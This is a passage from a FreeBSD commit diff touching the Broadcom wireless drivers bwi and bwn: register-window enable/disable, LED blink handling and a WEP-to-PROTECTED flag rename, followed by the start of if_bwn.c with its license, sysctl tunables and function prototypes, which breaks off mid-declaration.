char * bwi_regwin_name(const struct bwi_regwin *rw) { switch (rw->rw_type) { case BWI_REGWIN_T_COM: return "COM"; case BWI_REGWIN_T_BUSPCI: return "PCI"; case BWI_REGWIN_T_MAC: return "MAC"; case BWI_REGWIN_T_BUSPCIE: return "PCIE"; } panic("unknown regwin type 0x%04x\n", rw->rw_type); return NULL; } static uint32_t bwi_regwin_disable_bits(struct bwi_softc *sc) { uint32_t busrev; /* XXX cache this */ busrev = __SHIFTOUT(CSR_READ_4(sc, BWI_ID_LO), BWI_ID_LO_BUSREV_MASK); DPRINTF(sc, BWI_DBG_ATTACH | BWI_DBG_INIT | BWI_DBG_MISC, "bus rev %u\n", busrev); if (busrev == BWI_BUSREV_0) return BWI_STATE_LO_DISABLE1; else if (busrev == BWI_BUSREV_1) return BWI_STATE_LO_DISABLE2; else return (BWI_STATE_LO_DISABLE1 | BWI_STATE_LO_DISABLE2); } int bwi_regwin_is_enabled(struct bwi_softc *sc, struct bwi_regwin *rw) { uint32_t val, disable_bits; disable_bits = bwi_regwin_disable_bits(sc); val = CSR_READ_4(sc, BWI_STATE_LO); if ((val & (BWI_STATE_LO_CLOCK | BWI_STATE_LO_RESET | disable_bits)) == BWI_STATE_LO_CLOCK) { DPRINTF(sc, BWI_DBG_ATTACH | BWI_DBG_INIT, "%s is enabled\n", bwi_regwin_name(rw)); return 1; } else { DPRINTF(sc, BWI_DBG_ATTACH | BWI_DBG_INIT, "%s is disabled\n", bwi_regwin_name(rw)); return 0; } } void bwi_regwin_disable(struct bwi_softc *sc, struct bwi_regwin *rw, uint32_t flags) { uint32_t state_lo, disable_bits; int i; state_lo = CSR_READ_4(sc, BWI_STATE_LO); /* * If current regwin is in 'reset' state, it was already disabled. */ if (state_lo & BWI_STATE_LO_RESET) { DPRINTF(sc, BWI_DBG_ATTACH | BWI_DBG_INIT, "%s was already disabled\n", bwi_regwin_name(rw)); return; } disable_bits = bwi_regwin_disable_bits(sc); /* * Disable normal clock */ state_lo = BWI_STATE_LO_CLOCK | disable_bits; CSR_WRITE_4(sc, BWI_STATE_LO, state_lo); /* * Wait until normal clock is disabled */ #define NRETRY 1000 for (i = 0; i < NRETRY; ++i) { state_lo = CSR_READ_4(sc, BWI_STATE_LO); if (state_lo & disable_bits) break; DELAY(10); } if (i == NRETRY) { device_printf(sc->sc_dev, "%s disable clock timeout\n", bwi_regwin_name(rw)); } for (i = 0; i < NRETRY; ++i) { uint32_t state_hi; state_hi = CSR_READ_4(sc, BWI_STATE_HI); if ((state_hi & BWI_STATE_HI_BUSY) == 0) break; DELAY(10); } if (i == NRETRY) { device_printf(sc->sc_dev, "%s wait BUSY unset timeout\n", bwi_regwin_name(rw)); } #undef NRETRY /* * Reset and disable regwin with gated clock */ state_lo = BWI_STATE_LO_RESET | disable_bits | BWI_STATE_LO_CLOCK | BWI_STATE_LO_GATED_CLOCK | __SHIFTIN(flags, BWI_STATE_LO_FLAGS_MASK); CSR_WRITE_4(sc, BWI_STATE_LO, state_lo); /* Flush pending bus write */ CSR_READ_4(sc, BWI_STATE_LO); DELAY(1); /* Reset and disable regwin */ state_lo = BWI_STATE_LO_RESET | disable_bits | __SHIFTIN(flags, BWI_STATE_LO_FLAGS_MASK); CSR_WRITE_4(sc, BWI_STATE_LO, state_lo); /* Flush pending bus write */ CSR_READ_4(sc, BWI_STATE_LO); DELAY(1); } void bwi_regwin_enable(struct bwi_softc *sc, struct bwi_regwin *rw, uint32_t flags) { uint32_t state_lo, state_hi, imstate; bwi_regwin_disable(sc, rw, flags); /* Reset regwin with gated clock */ state_lo = BWI_STATE_LO_RESET | BWI_STATE_LO_CLOCK | BWI_STATE_LO_GATED_CLOCK | __SHIFTIN(flags, BWI_STATE_LO_FLAGS_MASK); CSR_WRITE_4(sc, BWI_STATE_LO, state_lo); /* Flush pending bus write */ CSR_READ_4(sc, BWI_STATE_LO); DELAY(1); state_hi = CSR_READ_4(sc, BWI_STATE_HI); if (state_hi & BWI_STATE_HI_SERROR) CSR_WRITE_4(sc, BWI_STATE_HI, 0); imstate = CSR_READ_4(sc, BWI_IMSTATE); if (imstate & (BWI_IMSTATE_INBAND_ERR | BWI_IMSTATE_TIMEOUT)) { imstate &= ~(BWI_IMSTATE_INBAND_ERR | BWI_IMSTATE_TIMEOUT); CSR_WRITE_4(sc, BWI_IMSTATE, imstate); } /* Enable regwin with gated clock */ state_lo = BWI_STATE_LO_CLOCK | BWI_STATE_LO_GATED_CLOCK | __SHIFTIN(flags, BWI_STATE_LO_FLAGS_MASK); CSR_WRITE_4(sc, BWI_STATE_LO, state_lo); /* Flush pending bus write */ CSR_READ_4(sc, BWI_STATE_LO); DELAY(1); /* Enable regwin with normal clock */ state_lo = BWI_STATE_LO_CLOCK | __SHIFTIN(flags, BWI_STATE_LO_FLAGS_MASK); CSR_WRITE_4(sc, BWI_STATE_LO, state_lo); /* Flush pending bus write */ CSR_READ_4(sc, BWI_STATE_LO); DELAY(1); } static void bwi_set_bssid(struct bwi_softc *sc, const uint8_t *bssid) { struct ifnet *ifp = sc->sc_ifp; struct bwi_mac *mac; struct bwi_myaddr_bssid buf; const uint8_t *p; uint32_t val; int n, i; KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; bwi_set_addr_filter(sc, BWI_ADDR_FILTER_BSSID, bssid); bcopy(IF_LLADDR(ifp), buf.myaddr, sizeof(buf.myaddr)); bcopy(bssid, buf.bssid, sizeof(buf.bssid)); n = sizeof(buf) / sizeof(val); p = (const uint8_t *)&buf; for (i = 0; i < n; ++i) { int j; val = 0; for (j = 0; j < sizeof(val); ++j) val |= ((uint32_t)(*p++)) << (j * 8); TMPLT_WRITE_4(mac, 0x20 + (i * sizeof(val)), val); } } static void bwi_updateslot(struct ifnet *ifp) { struct bwi_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct bwi_mac *mac; BWI_LOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) { DPRINTF(sc, BWI_DBG_80211, "%s\n", __func__); KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; bwi_mac_updateslot(mac, (ic->ic_flags & IEEE80211_F_SHSLOT)); } BWI_UNLOCK(sc); } static void bwi_calibrate(void *xsc) { struct bwi_softc *sc = xsc; #ifdef INVARIANTS struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; #endif struct bwi_mac *mac; BWI_ASSERT_LOCKED(sc); KASSERT(ic->ic_opmode != IEEE80211_M_MONITOR, ("opmode %d", ic->ic_opmode)); KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; bwi_mac_calibrate_txpower(mac, sc->sc_txpwrcb_type); sc->sc_txpwrcb_type = BWI_TXPWR_CALIB; /* XXX 15 seconds */ callout_reset(&sc->sc_calib_ch, hz * 15, bwi_calibrate, sc); } static int bwi_calc_rssi(struct bwi_softc *sc, const struct bwi_rxbuf_hdr *hdr) { struct bwi_mac *mac; KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; return bwi_rf_calc_rssi(mac, hdr); } static int bwi_calc_noise(struct bwi_softc *sc) { struct bwi_mac *mac; KASSERT(sc->sc_cur_regwin->rw_type == BWI_REGWIN_T_MAC, ("current regwin type %d", sc->sc_cur_regwin->rw_type)); mac = (struct bwi_mac *)sc->sc_cur_regwin; return bwi_rf_calc_noise(mac); } static __inline uint8_t bwi_plcp2rate(const uint32_t plcp0, enum ieee80211_phytype type) { uint32_t plcp = le32toh(plcp0) & IEEE80211_OFDM_PLCP_RATE_MASK; return (ieee80211_plcp2rate(plcp, type)); } static void bwi_rx_radiotap(struct bwi_softc *sc, struct mbuf *m, struct bwi_rxbuf_hdr *hdr, const void *plcp, int rate, int rssi, int noise) { const struct ieee80211_frame_min *wh; sc->sc_rx_th.wr_flags = IEEE80211_RADIOTAP_F_FCS; if (htole16(hdr->rxh_flags1) & BWI_RXH_F1_SHPREAMBLE) sc->sc_rx_th.wr_flags |= IEEE80211_RADIOTAP_F_SHORTPRE; wh = mtod(m, const struct ieee80211_frame_min *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) sc->sc_rx_th.wr_flags |= IEEE80211_RADIOTAP_F_WEP; sc->sc_rx_th.wr_tsf = hdr->rxh_tsf; /* No endian convertion */ sc->sc_rx_th.wr_rate = rate; sc->sc_rx_th.wr_antsignal = rssi; sc->sc_rx_th.wr_antnoise = noise; } static void bwi_led_attach(struct bwi_softc *sc) { const uint8_t *led_act = NULL; uint16_t gpio, val[BWI_LED_MAX]; int i; #define N(arr) (int)(sizeof(arr) / sizeof(arr[0])) for (i = 0; i < N(bwi_vendor_led_act); ++i) { if (sc->sc_pci_subvid == bwi_vendor_led_act[i].vid) { led_act = bwi_vendor_led_act[i].led_act; break; } } if (led_act == NULL) led_act = bwi_default_led_act; #undef N gpio = bwi_read_sprom(sc, BWI_SPROM_GPIO01); val[0] = __SHIFTOUT(gpio, BWI_SPROM_GPIO_0); val[1] = __SHIFTOUT(gpio, BWI_SPROM_GPIO_1); gpio = bwi_read_sprom(sc, BWI_SPROM_GPIO23); val[2] = __SHIFTOUT(gpio, BWI_SPROM_GPIO_2); val[3] = __SHIFTOUT(gpio, BWI_SPROM_GPIO_3); for (i = 0; i < BWI_LED_MAX; ++i) { struct bwi_led *led = &sc->sc_leds[i]; if (val[i] == 0xff) { led->l_act = led_act[i]; } else { if (val[i] & BWI_LED_ACT_LOW) led->l_flags |= BWI_LED_F_ACTLOW; led->l_act = __SHIFTOUT(val[i], BWI_LED_ACT_MASK); } led->l_mask = (1 << i); if (led->l_act == BWI_LED_ACT_BLINK_SLOW || led->l_act == BWI_LED_ACT_BLINK_POLL || led->l_act == BWI_LED_ACT_BLINK) { led->l_flags |= BWI_LED_F_BLINK; if (led->l_act == BWI_LED_ACT_BLINK_POLL) led->l_flags |= BWI_LED_F_POLLABLE; else if (led->l_act == BWI_LED_ACT_BLINK_SLOW) led->l_flags |= BWI_LED_F_SLOW; if (sc->sc_blink_led == NULL) { sc->sc_blink_led = led; if (led->l_flags & BWI_LED_F_SLOW) BWI_LED_SLOWDOWN(sc->sc_led_idle); } } DPRINTF(sc, BWI_DBG_LED | BWI_DBG_ATTACH, "%dth led, act %d, lowact %d\n", i, led->l_act, led->l_flags & BWI_LED_F_ACTLOW); } callout_init_mtx(&sc->sc_led_blink_ch, &sc->sc_mtx, 0); } static __inline uint16_t bwi_led_onoff(const struct bwi_led *led, uint16_t val, int on) { if (led->l_flags & BWI_LED_F_ACTLOW) on = !on; if (on) val |= led->l_mask; else val &= ~led->l_mask; return val; } static void bwi_led_newstate(struct bwi_softc *sc, enum ieee80211_state nstate) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint16_t val; int i; if (nstate == IEEE80211_S_INIT) { callout_stop(&sc->sc_led_blink_ch); sc->sc_led_blinking = 0; } if ((ic->ic_ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; val = CSR_READ_2(sc, BWI_MAC_GPIO_CTRL); for (i = 0; i < BWI_LED_MAX; ++i) { struct bwi_led *led = &sc->sc_leds[i]; int on; if (led->l_act == BWI_LED_ACT_UNKN || led->l_act == BWI_LED_ACT_NULL) continue; if ((led->l_flags & BWI_LED_F_BLINK) && nstate != IEEE80211_S_INIT) continue; switch (led->l_act) { case BWI_LED_ACT_ON: /* Always on */ on = 1; break; case BWI_LED_ACT_OFF: /* Always off */ case BWI_LED_ACT_5GHZ: /* TODO: 11A */ on = 0; break; default: on = 1; switch (nstate) { case IEEE80211_S_INIT: on = 0; break; case IEEE80211_S_RUN: if (led->l_act == BWI_LED_ACT_11G && ic->ic_curmode != IEEE80211_MODE_11G) on = 0; break; default: if (led->l_act == BWI_LED_ACT_ASSOC) on = 0; break; } break; } val = bwi_led_onoff(led, val, on); } CSR_WRITE_2(sc, BWI_MAC_GPIO_CTRL, val); } static void bwi_led_event(struct bwi_softc *sc, int event) { struct bwi_led *led = sc->sc_blink_led; int rate; if (event == BWI_LED_EVENT_POLL) { if ((led->l_flags & BWI_LED_F_POLLABLE) == 0) return; if (ticks - sc->sc_led_ticks < sc->sc_led_idle) return; } sc->sc_led_ticks = ticks; if (sc->sc_led_blinking) return; switch (event) { case BWI_LED_EVENT_RX: rate = sc->sc_rx_rate; break; case BWI_LED_EVENT_TX: rate = sc->sc_tx_rate; break; case BWI_LED_EVENT_POLL: rate = 0; break; default: panic("unknown LED event %d\n", event); break; } bwi_led_blink_start(sc, bwi_led_duration[rate].on_dur, bwi_led_duration[rate].off_dur); } static void bwi_led_blink_start(struct bwi_softc *sc, int on_dur, int off_dur) { struct bwi_led *led = sc->sc_blink_led; uint16_t val; val = CSR_READ_2(sc, BWI_MAC_GPIO_CTRL); val = bwi_led_onoff(led, val, 1); CSR_WRITE_2(sc, BWI_MAC_GPIO_CTRL, val); if (led->l_flags & BWI_LED_F_SLOW) { BWI_LED_SLOWDOWN(on_dur); BWI_LED_SLOWDOWN(off_dur); } sc->sc_led_blinking = 1; sc->sc_led_blink_offdur = off_dur; callout_reset(&sc->sc_led_blink_ch, on_dur, bwi_led_blink_next, sc); } static void bwi_led_blink_next(void *xsc) { struct bwi_softc *sc = xsc; uint16_t val; val = CSR_READ_2(sc, BWI_MAC_GPIO_CTRL); val = bwi_led_onoff(sc->sc_blink_led, val, 0); CSR_WRITE_2(sc, BWI_MAC_GPIO_CTRL, val); callout_reset(&sc->sc_led_blink_ch, sc->sc_led_blink_offdur, bwi_led_blink_end, sc); } static void bwi_led_blink_end(void *xsc) { struct bwi_softc *sc = xsc; sc->sc_led_blinking = 0; } static void bwi_restart(void *xsc, int pending) { struct bwi_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; if_printf(ifp, "%s begin, help!\n", __func__); BWI_LOCK(sc); bwi_init_statechg(xsc, 0); #if 0 bwi_start_locked(ifp); #endif BWI_UNLOCK(sc); } diff --git a/sys/dev/bwn/if_bwn.c b/sys/dev/bwn/if_bwn.c index e7174ebd189e..cc34b12095e0 100644 --- a/sys/dev/bwn/if_bwn.c +++ b/sys/dev/bwn/if_bwn.c @@ -1,14242 +1,14242 @@ /*- * Copyright (c) 2009-2010 Weongyo Jeong * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer, * without modification. * 2. Redistributions in binary form must reproduce at minimum a disclaimer * similar to the "NO WARRANTY" disclaimer below ("Disclaimer") and any * redistribution must be conditioned upon including a substantially * similar Disclaimer requirement for further binary redistribution. * * NO WARRANTY * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF NONINFRINGEMENT, MERCHANTIBILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR SPECIAL, EXEMPLARY, * OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER * IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGES. */ #include __FBSDID("$FreeBSD$"); /* * The Broadcom Wireless LAN controller driver. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include static SYSCTL_NODE(_hw, OID_AUTO, bwn, CTLFLAG_RD, 0, "Broadcom driver parameters"); /* * Tunable & sysctl variables. */ #ifdef BWN_DEBUG static int bwn_debug = 0; SYSCTL_INT(_hw_bwn, OID_AUTO, debug, CTLFLAG_RW, &bwn_debug, 0, "Broadcom debugging printfs"); TUNABLE_INT("hw.bwn.debug", &bwn_debug); enum { BWN_DEBUG_XMIT = 0x00000001, /* basic xmit operation */ BWN_DEBUG_RECV = 0x00000002, /* basic recv operation */ BWN_DEBUG_STATE = 0x00000004, /* 802.11 state transitions */ BWN_DEBUG_TXPOW = 0x00000008, /* tx power processing */ BWN_DEBUG_RESET = 0x00000010, /* reset processing */ BWN_DEBUG_OPS = 0x00000020, /* bwn_ops processing */ BWN_DEBUG_BEACON = 0x00000040, /* beacon handling */ BWN_DEBUG_WATCHDOG = 0x00000080, /* watchdog timeout */ BWN_DEBUG_INTR = 0x00000100, /* ISR */ BWN_DEBUG_CALIBRATE = 0x00000200, /* periodic calibration */ BWN_DEBUG_NODE = 0x00000400, /* node management */ BWN_DEBUG_LED = 0x00000800, /* led management */ BWN_DEBUG_CMD = 0x00001000, /* cmd submission */ BWN_DEBUG_LO = 0x00002000, /* LO */ BWN_DEBUG_FW = 0x00004000, /* firmware */ BWN_DEBUG_WME = 0x00008000, /* WME */ BWN_DEBUG_RF = 0x00010000, /* RF */ BWN_DEBUG_FATAL = 0x80000000, /* fatal errors */ BWN_DEBUG_ANY = 0xffffffff }; #define DPRINTF(sc, m, fmt, ...) do { \ if (sc->sc_debug & (m)) \ printf(fmt, __VA_ARGS__); \ } while (0) #else #define DPRINTF(sc, m, fmt, ...) do { (void) sc; } while (0) #endif static int bwn_bfp = 0; /* use "Bad Frames Preemption" */ SYSCTL_INT(_hw_bwn, OID_AUTO, bfp, CTLFLAG_RW, &bwn_bfp, 0, "uses Bad Frames Preemption"); static int bwn_bluetooth = 1; SYSCTL_INT(_hw_bwn, OID_AUTO, bluetooth, CTLFLAG_RW, &bwn_bluetooth, 0, "turns on Bluetooth Coexistence"); static int bwn_hwpctl = 0; SYSCTL_INT(_hw_bwn, OID_AUTO, hwpctl, CTLFLAG_RW, &bwn_hwpctl, 0, "uses H/W power control"); static int bwn_msi_disable = 0; /* MSI disabled */ TUNABLE_INT("hw.bwn.msi_disable", &bwn_msi_disable); static int bwn_usedma = 1; SYSCTL_INT(_hw_bwn, OID_AUTO, usedma, CTLFLAG_RD, &bwn_usedma, 0, "uses DMA"); TUNABLE_INT("hw.bwn.usedma", &bwn_usedma); static int bwn_wme = 1; SYSCTL_INT(_hw_bwn, OID_AUTO, wme, CTLFLAG_RW, &bwn_wme, 0, "uses WME support"); static int bwn_attach_pre(struct bwn_softc *); static int bwn_attach_post(struct bwn_softc *); static void bwn_sprom_bugfixes(device_t); static void bwn_init(void *); static int bwn_init_locked(struct bwn_softc *); static int bwn_ioctl(struct ifnet *, u_long, caddr_t); static void bwn_start(struct ifnet *); static int bwn_attach_core(struct bwn_mac *); static void bwn_reset_core(struct bwn_mac *, uint32_t); static int bwn_phy_getinfo(struct bwn_mac *, int); static int bwn_chiptest(struct bwn_mac *); static int bwn_setup_channels(struct bwn_mac *, int, int); static int bwn_phy_g_attach(struct bwn_mac *); static void bwn_phy_g_detach(struct bwn_mac *); static void bwn_phy_g_init_pre(struct bwn_mac *); static int bwn_phy_g_prepare_hw(struct bwn_mac *); static int bwn_phy_g_init(struct bwn_mac *); static void bwn_phy_g_exit(struct bwn_mac *); static uint16_t bwn_phy_g_read(struct bwn_mac *, uint16_t); static void bwn_phy_g_write(struct bwn_mac *, uint16_t, uint16_t); static uint16_t bwn_phy_g_rf_read(struct bwn_mac *, uint16_t); static void bwn_phy_g_rf_write(struct bwn_mac *, uint16_t, uint16_t); static int bwn_phy_g_hwpctl(struct bwn_mac *); static void bwn_phy_g_rf_onoff(struct bwn_mac *, int); static int bwn_phy_g_switch_channel(struct bwn_mac *, uint32_t); static uint32_t bwn_phy_g_get_default_chan(struct bwn_mac *); static void bwn_phy_g_set_antenna(struct bwn_mac *, int); static int bwn_phy_g_im(struct bwn_mac *, int); static int bwn_phy_g_recalc_txpwr(struct bwn_mac *, int); static void bwn_phy_g_set_txpwr(struct bwn_mac *); static void bwn_phy_g_task_15s(struct bwn_mac *); static void bwn_phy_g_task_60s(struct bwn_mac *); static uint16_t bwn_phy_g_txctl(struct bwn_mac *); static void bwn_phy_switch_analog(struct bwn_mac *, int); static uint16_t bwn_shm_read_2(struct bwn_mac *, uint16_t, uint16_t); static void bwn_shm_write_2(struct bwn_mac *, uint16_t, uint16_t, uint16_t); static uint32_t bwn_shm_read_4(struct bwn_mac *, uint16_t, uint16_t); static void bwn_shm_write_4(struct bwn_mac *, uint16_t, uint16_t, uint32_t); static void bwn_shm_ctlword(struct bwn_mac *, uint16_t, uint16_t); static void bwn_addchannels(struct ieee80211_channel [], int, int *, const struct bwn_channelinfo *, int); static int bwn_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); static void bwn_updateslot(struct ifnet *); static void bwn_update_promisc(struct ifnet *); static void bwn_wme_init(struct bwn_mac *); static int bwn_wme_update(struct ieee80211com *); static void bwn_wme_clear(struct bwn_softc *); static void bwn_wme_load(struct bwn_mac *); static void bwn_wme_loadparams(struct bwn_mac *, const struct wmeParams *, uint16_t); static void bwn_scan_start(struct ieee80211com *); static void bwn_scan_end(struct ieee80211com *); static void bwn_set_channel(struct ieee80211com *); static struct ieee80211vap *bwn_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void bwn_vap_delete(struct ieee80211vap *); static void bwn_stop(struct bwn_softc *, int); static void bwn_stop_locked(struct bwn_softc *, int); static int bwn_core_init(struct bwn_mac *); static void bwn_core_start(struct bwn_mac *); static void bwn_core_exit(struct bwn_mac *); static void bwn_bt_disable(struct bwn_mac *); static int bwn_chip_init(struct bwn_mac *); static uint64_t bwn_hf_read(struct bwn_mac *); static void bwn_hf_write(struct bwn_mac *, uint64_t); static void bwn_set_txretry(struct bwn_mac *, int, int); static void bwn_rate_init(struct bwn_mac *); static void bwn_set_phytxctl(struct bwn_mac *); static void bwn_spu_setdelay(struct bwn_mac *, int); static void bwn_bt_enable(struct bwn_mac *); static void bwn_set_macaddr(struct bwn_mac *); static void bwn_crypt_init(struct bwn_mac *); static void bwn_chip_exit(struct bwn_mac *); static int bwn_fw_fillinfo(struct bwn_mac *); static int bwn_fw_loaducode(struct bwn_mac *); static int bwn_gpio_init(struct bwn_mac *); static int bwn_fw_loadinitvals(struct bwn_mac *); static int bwn_phy_init(struct bwn_mac *); static void bwn_set_txantenna(struct bwn_mac *, int); static void bwn_set_opmode(struct bwn_mac *); static void bwn_rate_write(struct bwn_mac *, uint16_t, int); static uint8_t bwn_plcp_getcck(const uint8_t); static uint8_t bwn_plcp_getofdm(const uint8_t); static void bwn_pio_init(struct bwn_mac *); static uint16_t bwn_pio_idx2base(struct bwn_mac *, int); static void bwn_pio_set_txqueue(struct bwn_mac *, struct bwn_pio_txqueue *, int); static void bwn_pio_setupqueue_rx(struct bwn_mac *, struct bwn_pio_rxqueue *, int); static void bwn_destroy_queue_tx(struct bwn_pio_txqueue *); static uint16_t bwn_pio_read_2(struct bwn_mac *, struct bwn_pio_txqueue *, uint16_t); static void bwn_pio_cancel_tx_packets(struct bwn_pio_txqueue *); static int bwn_pio_rx(struct bwn_pio_rxqueue *); static uint8_t bwn_pio_rxeof(struct bwn_pio_rxqueue *); static void bwn_pio_handle_txeof(struct bwn_mac *, const struct bwn_txstatus *); static uint16_t bwn_pio_rx_read_2(struct bwn_pio_rxqueue *, uint16_t); static uint32_t bwn_pio_rx_read_4(struct bwn_pio_rxqueue *, uint16_t); static void bwn_pio_rx_write_2(struct bwn_pio_rxqueue *, uint16_t, uint16_t); static void bwn_pio_rx_write_4(struct bwn_pio_rxqueue *, uint16_t, uint32_t); static int bwn_pio_tx_start(struct bwn_mac *, struct ieee80211_node *, struct mbuf *); static struct bwn_pio_txqueue *bwn_pio_select(struct bwn_mac *, uint8_t); static uint32_t bwn_pio_write_multi_4(struct bwn_mac *, struct bwn_pio_txqueue *, uint32_t, const void *, int); static void bwn_pio_write_4(struct bwn_mac *, struct bwn_pio_txqueue *, uint16_t, uint32_t); static uint16_t bwn_pio_write_multi_2(struct bwn_mac *, struct bwn_pio_txqueue *, uint16_t, const void *, int); static uint16_t bwn_pio_write_mbuf_2(struct bwn_mac *, struct bwn_pio_txqueue *, uint16_t, struct mbuf *); static struct bwn_pio_txqueue *bwn_pio_parse_cookie(struct bwn_mac *, uint16_t, struct bwn_pio_txpkt **); static void bwn_dma_init(struct bwn_mac *); static void bwn_dma_rxdirectfifo(struct bwn_mac *, int, uint8_t); static int bwn_dma_mask2type(uint64_t); static uint64_t bwn_dma_mask(struct bwn_mac *); static uint16_t bwn_dma_base(int, int); static void bwn_dma_ringfree(struct bwn_dma_ring **); static void bwn_dma_32_getdesc(struct bwn_dma_ring *, int, struct bwn_dmadesc_generic **, struct bwn_dmadesc_meta **); static void bwn_dma_32_setdesc(struct bwn_dma_ring *, struct bwn_dmadesc_generic *, bus_addr_t, uint16_t, int, int, int); static void bwn_dma_32_start_transfer(struct bwn_dma_ring *, int); static void bwn_dma_32_suspend(struct bwn_dma_ring *); static void bwn_dma_32_resume(struct bwn_dma_ring *); static int bwn_dma_32_get_curslot(struct bwn_dma_ring *); static void bwn_dma_32_set_curslot(struct bwn_dma_ring *, int); static void bwn_dma_64_getdesc(struct bwn_dma_ring *, int, struct bwn_dmadesc_generic **, struct bwn_dmadesc_meta **); static void bwn_dma_64_setdesc(struct bwn_dma_ring *, struct bwn_dmadesc_generic *, bus_addr_t, uint16_t, int, int, int); static void bwn_dma_64_start_transfer(struct bwn_dma_ring *, int); static void bwn_dma_64_suspend(struct bwn_dma_ring *); static void bwn_dma_64_resume(struct bwn_dma_ring *); static int bwn_dma_64_get_curslot(struct bwn_dma_ring *); static void bwn_dma_64_set_curslot(struct bwn_dma_ring *, int); static int bwn_dma_allocringmemory(struct bwn_dma_ring *); static void bwn_dma_setup(struct bwn_dma_ring *); static void bwn_dma_free_ringmemory(struct bwn_dma_ring *); static void bwn_dma_cleanup(struct bwn_dma_ring *); static void bwn_dma_free_descbufs(struct bwn_dma_ring *); static int bwn_dma_tx_reset(struct bwn_mac *, uint16_t, int); static void bwn_dma_rx(struct bwn_dma_ring *); static int bwn_dma_rx_reset(struct bwn_mac *, uint16_t, int); static void bwn_dma_free_descbuf(struct bwn_dma_ring *, struct bwn_dmadesc_meta *); static void bwn_dma_set_redzone(struct bwn_dma_ring *, struct mbuf *); static int bwn_dma_gettype(struct bwn_mac *); static void bwn_dma_ring_addr(void *, bus_dma_segment_t *, int, int); static int bwn_dma_freeslot(struct bwn_dma_ring *); static int bwn_dma_nextslot(struct bwn_dma_ring *, int); static void bwn_dma_rxeof(struct bwn_dma_ring *, int *); static int bwn_dma_newbuf(struct bwn_dma_ring *, struct bwn_dmadesc_generic *, struct bwn_dmadesc_meta *, int); static void bwn_dma_buf_addr(void *, bus_dma_segment_t *, int, bus_size_t, int); static uint8_t bwn_dma_check_redzone(struct bwn_dma_ring *, struct mbuf *); static void bwn_dma_handle_txeof(struct bwn_mac *, const struct bwn_txstatus *); static int bwn_dma_tx_start(struct bwn_mac *, struct ieee80211_node *, struct mbuf *); static int bwn_dma_getslot(struct bwn_dma_ring *); static struct bwn_dma_ring *bwn_dma_select(struct bwn_mac *, uint8_t); static int bwn_dma_attach(struct bwn_mac *); static struct bwn_dma_ring *bwn_dma_ringsetup(struct bwn_mac *, int, int, int); static struct bwn_dma_ring *bwn_dma_parse_cookie(struct bwn_mac *, const struct bwn_txstatus *, uint16_t, int *); static void bwn_dma_free(struct bwn_mac *); static void bwn_phy_g_init_sub(struct bwn_mac *); static uint8_t bwn_has_hwpctl(struct bwn_mac *); static void bwn_phy_init_b5(struct bwn_mac *); static void bwn_phy_init_b6(struct bwn_mac *); static void bwn_phy_init_a(struct bwn_mac *); static void bwn_loopback_calcgain(struct bwn_mac *); static uint16_t bwn_rf_init_bcm2050(struct bwn_mac *); static void bwn_lo_g_init(struct bwn_mac *); static void bwn_lo_g_adjust(struct bwn_mac *); static void bwn_lo_get_powervector(struct bwn_mac *); static struct bwn_lo_calib *bwn_lo_calibset(struct bwn_mac *, const struct bwn_bbatt *, const struct bwn_rfatt *); static void bwn_lo_write(struct bwn_mac *, struct bwn_loctl *); static void bwn_phy_hwpctl_init(struct bwn_mac *); static void bwn_phy_g_switch_chan(struct bwn_mac *, int, uint8_t); static void bwn_phy_g_set_txpwr_sub(struct bwn_mac *, const struct bwn_bbatt *, const struct bwn_rfatt *, uint8_t); static void bwn_phy_g_set_bbatt(struct bwn_mac *, uint16_t); static uint16_t bwn_rf_2050_rfoverval(struct bwn_mac *, uint16_t, uint32_t); static void bwn_spu_workaround(struct bwn_mac *, uint8_t); static void bwn_wa_init(struct bwn_mac *); static void bwn_ofdmtab_write_2(struct bwn_mac *, uint16_t, uint16_t, uint16_t); static void bwn_dummy_transmission(struct bwn_mac *, int, int); static void 